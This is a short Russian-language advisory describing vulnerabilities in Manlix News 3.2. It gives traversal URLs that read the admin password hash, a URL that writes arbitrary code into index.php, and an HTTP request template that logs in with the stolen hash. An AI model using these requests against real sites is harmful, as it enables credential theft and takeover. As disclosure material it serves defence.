Программа: Manlix News 3.2
Несколько уязвимостей в Mantix news позволяют удаленному пользователю просматривать произвольные файлы на сервере, изменять произвольные локальные файлы и получить административный доступ к приложению.
1. Просмотр произвольных файлов на сервере:
http://127.0.0.1/index?news_section= ../admins.inc.dat - получаем хеш пароля админа.
2. Изменение локальных файлов (в системе
администрирования):
http://127.0.0.1/admin.php?section= 0_0¤t_section=../../index.php - добавление в файл index.php произвольного кода
3. Возможность получения доступа к системе
администрирования по хешу и логину.
GET /admin.php?section=0_0¤t_section=[куда пишем]&day=01&month=01&year=2004&
hour=03&minute=00&second=00&news=[что пишем] &add_news=ok HTTP/1.1
Host: [хост]
Cookie: manlix_news_login=[логин]; manlix_news_password=[хеш пароля]
